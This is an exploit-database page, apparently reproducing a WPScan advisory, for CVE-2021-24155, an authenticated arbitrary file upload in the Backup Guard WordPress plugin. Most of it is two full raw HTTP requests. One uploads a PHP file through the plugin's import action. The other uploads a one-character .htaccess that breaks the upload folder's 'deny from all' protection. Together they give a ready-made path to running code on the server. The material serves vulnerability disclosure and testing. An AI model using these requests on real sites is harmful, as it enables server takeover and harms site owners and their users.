Exploit for Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload CVE-2021-24155

Name: Exploit for Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload CVE-2021-24155
Rating: 5 (518 reviews)
2021-02-18 | CVSS -0.7
## https://sploitus.com/exploit?id=WPEX-ID:D442ACAC-4394-45E4-B6BB-ADF4A40960FB
Video of the issue on a Nginx Web server, as sent by the reporter: https://drive.google.com/file/d/1W9faaIZ6rPgrui8lzeY2s9cgKrGJhWTL/view?usp=sharing

Additional Info (WPScanTeam):

As an administrator, open the Backup page (/wp-admin/admin.php?page=backup_guard_backups) and Import a PHP file, which will then be located at /wp-content/uploads/backup-guard/<filename.php>

If the web server supports .htaccess, just import a .htaccess with b as content, which will be appended to the existing .htaccess, making the deny from all become deny from allb and be invalid without raising any error

Raw requests:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 229
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename="info.php"
Content-Type: text/php

<?=phpinfo();?>
-----------------------------130490272991349650929022108--


If .htaccess supported by the webserver, the following request will remove the protection by appending a b to the existing deny from all line:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 216
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename=".htaccess"
Content-Type: text/php

b
-----------------------------130490272991349650929022108--